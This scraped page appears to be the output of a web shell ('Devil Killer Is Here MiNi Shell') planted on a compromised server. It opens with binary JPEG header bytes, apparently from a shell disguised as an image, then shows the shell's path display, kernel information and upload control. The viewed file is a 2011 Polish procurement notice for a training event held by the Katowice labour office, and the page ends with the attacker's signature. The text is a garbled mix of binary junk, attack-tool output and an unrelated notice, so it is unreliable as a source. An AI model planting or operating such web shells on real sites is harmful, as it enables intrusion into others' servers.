JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111012/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111012/268445-N-2011.html

<p class="kh_header"><b>Katowice: ZORGANIZOWANIE I PRZEPROWADZENIE SZKOLENIA PN.: RADA ZATRUDNIENIA A NOWE MOŻLIWOŚCI AKTYWIZACJI LOKALNEGO RYNKU PRACY. NOWOCZESNE NARZĘDZIA I INSTRUMENTY RYNKU PRACY</b><br>
<b>Numer ogłoszenia: 268445 - 2011; data zamieszczenia: 12.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Urząd Pracy , ul. Kościuszki 30, 40-048 Katowice, woj. śląskie, tel. 0 32 757 33 61.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wup-katowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna samorządu województwa nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZORGANIZOWANIE I PRZEPROWADZENIE SZKOLENIA PN.: RADA ZATRUDNIENIA A NOWE MOŻLIWOŚCI AKTYWIZACJI LOKALNEGO RYNKU PRACY. NOWOCZESNE NARZĘDZIA I INSTRUMENTY RYNKU PRACY.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa polegająca na zorganizowaniu i przeprowadzeniu  dwudniowego, wyjazdowego szkolenia z zakresu Rada Zatrudnienia a nowe możliwości aktywizacji lokalnego rynku pracy. Nowoczesne narzędzia i instrumenty rynku pracy.
W szkoleniu udział wezmą członkowie Wojewódzkiej Rady Zatrudnienia Województwa Śląskiego oraz przedstawiciele Wojewódzkiego Urzędu Pracy w Katowicach - łącznie 
20 osób.
Ostateczna ilość osób biorących udział w szkoleniu zostanie podana nie później niż 
na trzy dni kalendarzowe przed planowanym terminem szkolenia, przy czym minimalna liczba uczestników szkolenia nie będzie mniejsza niż 15 osób.

Szkolenie ma zostać przeprowadzone w terminie: 24 - 25 listopada 2011 r. 

Szkolenie trwać będzie 11 godzin szkoleniowych (1 godzina szkoleniowa = 45 min.) 
i zostanie zorganizowane na terenie woj. śląskiego w regionie Podbeskidzia (tj. obszar Subregionu południowego województwa śląskiego: Bielska-Białej oraz powiatów bielskiego, cieszyńskiego i żywieckiego) lub Jury Krakowsko - Częstochowskiej (woj. śląskie), w hotelu o standardzie co najmniej trzygwiazdkowym lub obiekcie hotelarskim spełniającym wymagania dla hotelu o standardzie co najmniej trzygwiazdkowym. 
 
Zakres merytoryczny szkolenia powinien być dostosowany do potrzeb uczestników szkolenia oraz specyfiki funkcjonowania wojewódzkich rad zatrudnienia. Szkolenie jest skierowane do członków Wojewódzkiej Rady Zatrudnienia Województwa Śląskiego, będącej organem opiniodawczo - doradczym marszałka województwa w sprawach polityki rynku pracy oraz przedstawicieli Wojewódzkiego Urzędu Pracy w Katowicach. 
Celem głównym szkolenia jest usystematyzowanie wiedzy w zakresie przemian zachodzących na polskim i europejskim rynku pracy, przedstawienie nowych metod walki z bezrobociem, w tym poszerzenie wiedzy w zakresie nowych narzędzi aktywizacji bezrobotnych i poszukujących pracy. Szkolenie ma na celu ponadto poszerzenie wiedzy dotyczącej możliwości współpracy z organizacjami pozarządowymi w odniesieniu do zapisów ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy, a także wskazanie możliwości współpracy na rzecz lokalnego rynku pracy z uwzględnieniem środków zewnętrznych.
Program szkolenia obejmować powinien w szczególności:
1.	Prawne aspekty działania wojewódzkiej rady zatrudnienia.
2.	Przegląd ustawowych usług i instrumentów rynku pracy.
3.	Rola i tworzenie Regionalnego Planu Działań na Rzecz Zatrudnienia.
4.	Nowe możliwości aktywizacji lokalnego rynku pracy z zastosowaniem Programu Operacyjnego Kapitał Ludzki. Programy pilotażowe jako instrumenty wspomagające lokalne rynki pracy.
5.	Metody opracowywania projektów lokalnych inicjatyw i przedsięwzięć oraz możliwość pozyskiwania dla nich wsparcia (w tym wsparcia finansowego).

Wykonawca w celu prawidłowej realizacji przedmiotu zamówienia powinien zapewnić:
1)	zakwaterowanie każdego z uczestników szkolenia w pokojach jednoosobowych. Każdy pokój powinien mieć powierzchnię min. 10 m2. Minimalne wyposażenie pokoi: łóżko, nocny stolik lub półka przy każdym miejscu do spania, szafa lub zabudowana wnęka garderobiana, biurko lub stół, krzesło lub inny mebel do siedzenia (nie mniej niż 2 na pokój), lustro, wieszak na okrycie wierzchnie, telewizor. Wszystkie pokoje powinny posiadać łazienki wyposażone 
min. w: wannę z baterią i natryskiem lub kabinę natryskową, umywalkę z blatem 
lub półką, WC, mydło i żel pod prysznic, zestaw ręczników;

2)	pełne wyżywienie dla każdego uczestnika szkolenia, przy czym usługa restauracyjna:

- rozpocznie się od przerwy kawowej wraz z bufetem kanapkowym w dniu przyjazdu,
- zakończy się obiadem w ostatnim dniu pobytu.
Śniadania, obiady i kolacje powinny być podawane na zastawie ceramicznej 
z kompletem sztućców metalowych i serwetek w innej sali niż sala wykładowa, w tym dla każdego uczestnika szkolenia: 
- 1 śniadanie w formie szwedzkiego bufetu, w tym co najmniej:
-	pieczywo różnorodne, 
-	danie na ciepło: jajecznica i kiełbaski na gorąco,
-	wędliny różnorodne,
-	sery różnorodne: żółte, pleśniowe, białe,
-	dżemy,
-	mleko: ciepłe i zimne,
-	przetwory jogurtowe, 
-	płatki śniadaniowe,
-	świeże warzywa: pomidory, ogórek zielony,
-	napoje różnorodne: kawa, herbata, soki owocowe (0,33l os.), woda mineralna gazowana i niegazowana (033l os.),
-	dodatki: cytryna, cukier, mleko, masło, margaryna.
- 2 obiady, w tym każdy składający się z: 
-	zupy,
-	dania głównego (mięsne z dodatkiem ziemniaków i zestawu surówek),
-	napojów: kawa, herbata, soki owocowe (0,33l os.), woda mineralna gazowana 
i niegazowana (033l os.),
-	dodatków: cytryna, cukier, mleko.
Wszystkie składniki obiadu podawanego pierwszego dnia szkolenia powinny być różne od składników obiadu podawanego w drugim dniu szkolenia. Obiad 
dla każdego uczestnika powinien być podany na ciepło i może być dostarczony jako wyporcjowany lub porcjowanie może odbywać się w chwili podawania obiadu. 

- 4 przerwy kawowe (3 przerwy w pierwszym dniu szkolenia oraz 1 przerwa 
w drugim dniu szkolenia):

-	pierwsza przerwa składająca się z: 
-	kanapek: z szynką, łososiem, serem, pomidorem, jajkiem, na białym pieczywie - po 3 każdego rodzaju przypadające na jedną osobę, rogalików z nadzieniem nie mniej niż 40 g na osobę,
-	napojów: kawa, herbata, soki owocowe (0,33 l os.), woda mineralna gazowana i niegazowana (033l os.),
-	dodatków: cytryna, cukier, mleko;
-	druga przerwa składająca się z:
-	wyrobów cukierniczych różnorodnych: kruche ciasteczka, wafelki, rogaliki
z nadzieniem (nie mniej niż 40g na osobę z każdego rodzaju),
-	napojów: kawa, herbata, soki owocowe (0,33 los.), woda mineralna gazowana i niegazowana (033l os.),
-	dodatków: cytryna, cukier, mleko.
-	trzecia przerwa składająca się z:  
-	wyrobów cukierniczych różnorodnych: kruche ciasteczka, wafelki, rogaliki
 	z nadzieniem (nie mniej niż 40g na osobę z każdego rodzaju),
-	napojów: kawa, herbata, soki owocowe (0,33l os.), woda mineralna gazowana i niegazowana (033l os.),
-	dodatków: cytryna, cukier, mleko.
-	czwarta przerwa składająca się z:  
-	wyrobów cukierniczych różnorodnych: kruche ciasteczka, wafelki, rogaliki
 	z nadzieniem (nie mniej niż 40g na osobę z każdego rodzaju),
-	napojów: kawa, herbata, soki owocowe (0,33l os.), woda mineralna gazowana i niegazowana (033l os.),
-	dodatków: cytryna, cukier, mleko.
- 1 kolacja składająca się z:
-	dania głównego podanego na ciepło: bogracz i barszcz z krokietem,
- zimnej płyty składającej się z różnorodnych: wędlin, serów, warzyw marynowanych, śledzi, 3 rodzajów sałatek w tym: grecka, z kurczakiem, 
z tuńczykiem,
-	napojów: kawa, herbata, soki owocowe (0,33l os.), woda mineralna gazowana i niegazowana (033 l os.),
-	dodatków: cytryna, cukier, mleko.
Wszystkie składniki kolacji powinny być różne od składników obiadów podawanych podczas dwóch dni szkolenia. 
3)	salę szkoleniową przygotowaną w układzie bankietowym mieszczącą co najmniej 
25 osób i zlokalizowaną w miejscu zakwaterowania uczestników. Sala wyposażona powinna być w sprzęt niezbędny do przeprowadzenia szkolenia, w tym: laptop, rzutnik multimedialny, ekran, tablicę typu flipchart oraz nagłośnienie i klimatyzację.  Sala szkoleniowa powinna być dostępna dla uczestników szkolenia również po zakończeniu zajęć, w pierwszym dniu pobytu.

4)	osobę prowadzącą szkolenie, która poprowadzi przedmiotowe szkolenie wykorzystując przygotowane przez siebie prezentacje multimedialne, a także udzieli odpowiedzi na zadawane przez uczestników pytania i wyjaśni ich wątpliwości.

5)	bezpłatne miejsca parkingowe dla uczestników szkolenia.

6)	przeprowadzenie szkolenia zgodnie z harmonogramem szkolenia przedstawionym w załączniku do opisu przedmiotu zamówienia, uwzględniając zakres merytoryczny i zagadnienia opisane w szczegółowym opisie przedmiotu zamówienia. Harmonogram szkolenia powinien zostać przedstawiony Zamawiającemu najpóźniej w dniu zawarcia umowy.

7)	materiały szkoleniowe dla każdego uczestnika szkolenia (teczka, notes, długopis, prezentacja szkolenia w formie papierowej i elektronicznej).

8)	wydanie imiennych certyfikatów potwierdzających udział w szkoleniu, zgodnie 
z listą obecności.

UWAGI:

1)	Płatność za usługę nastąpi po zorganizowaniu i przeprowadzeniu szkolenia, przy czym koszt będzie uzależniony od rzeczywistej liczby uczestników, zgłoszonych 
na 3 dni kalendarzowe przed terminem szkolenia.

2)	Szkolenie finansowane jest w całości ze środków publicznych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 24.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie ww warunku, jeżeli Wykonawca wykaże, 
iż w okresie ostatnich trzech lat przed upływem terminu składania ofert, 
a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał, a w przypadku świadczeń okresowych lub ciągłych wykonuje należycie 2 usługi o wartości nie mniejszej niż 14 000,00 zł każda, których przedmiotem było zorganizowanie i przeprowadzenie szkolenia z zakresu aktywizacji zawodowej osób bezrobotnych

Opis sposobu dokonywania oceny spełnienia tego warunku:
Zamawiający dokona oceny spełnienia ww warunku według formuły spełnia nie spełnia na podstawie załączonego do oferty wykazu 2 usług wykonanych bądź wykonywanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, przy czym przedmiotem każdej usługi było zorganizowanie 
i przeprowadzenie szkolenia z zakresu aktywizacji zawodowej osób bezrobotnych, z podaniem nazwy jednostki, dla której było organizowane, zagadnieniami omawianymi w trakcie szkolenia, daty jego realizacji, wartości (przy każdym szkoleniu należy wpisać kwotę, za jaką zostało zrealizowane, gdyż zgodnie z warunkiem wartość jednego szkolenia ma być nie mniejsza niż 14 000,00 zł) oraz załączeniem dokumentów potwierdzających, że szkolenia wymienione w wykazie zostały wykonane lub są wykonywane należycie (np. referencje). 

Dokumenty potwierdzające należyte wykonanie powinny zostać przedstawione w formie oryginału lub czytelnej kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę lub osobę upoważnioną do występowania w imieniu Wykonawcy.

Nie wykazanie spełnienia ww warunku skutkować będzie wykluczeniem Wykonawcy z postępowania zgodnie z art. 24 ust. 2 pkt 4 ustawy Pzp.
Wykonawca może polegać na wiedzy i doświadczeniu, osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w  takiej sytuacji  zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie ww warunku, jeżeli Wykonawca wykaże, iż dysponuje 1 osobą proponowaną do przeprowadzenia szkolenia, doświadczonego wykładowcę, praktyka , przy czym osoba ta musi się wykazać przeprowadzeniem 5 szkoleń w zakresie aktywizacji zawodowej osób bezrobotnych

Opis sposobu dokonywania oceny spełnienia tego warunku:
Zamawiający dokona oceny spełnienia ww warunku według formuły spełnia nie spełnia na podstawie załączonego do oferty wykazu zawierającego imię i nazwisko co najmniej 1 osoby, która będzie uczestniczyć w realizacji zamówienia jako wykładowcy wraz z informacjami na temat jej doświadczenia zawodowego niezbędnego do wykonania zamówienia (wskazanie 5 przeprowadzonych przez nią szkoleń z żądanej tematyki), z podaniem zagadnień omawianych w trakcie tych szkoleń, nazwą jednostki, dla której prowadziła szkolenie oraz informacją o podstawie do dysponowania tą osobą (np. umowa cywilno-prawna, umowa o dzieło, umowa zlecenie czy deklaracja uczestnictwa tej osoby w realizacji zamówienia).

Nie wykazanie spełnienia ww warunku skutkować będzie wykluczeniem Wykonawcy 
z postępowania zgodnie z art. 24 ust. 2 pkt 4 ustawy Pzp.

Wykonawca może polegać na wiedzy i doświadczeniu, osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w  takiej sytuacji  zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo, w sytuacjach, w których uprawnienie do występowania w imieniu Wykonawcy nie wynika z przedłożonego dokumentu wyszczególnionego w punkcie III.4.2) pkt 2. W przypadku złożenia kserokopii pełnomocnictwo musi być potwierdzone za zgodność z oryginałem przez Wykonawcę lub osobę upoważnioną.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Doświadczenie Wykonawcy - 35</li>
<li>3 - Jakość - 15</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://wup.katowice.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Urząd Pracy w Katowicach,  
ul. Kościuszki 30 , pok. 305, III piętro..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.10.2011 godzina 10:00, miejsce: Wojewódzki Urząd Pracy w Katowicach,  
ul. Kościuszki 30 , pok. 210- Kancelaria Urzędu, II piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com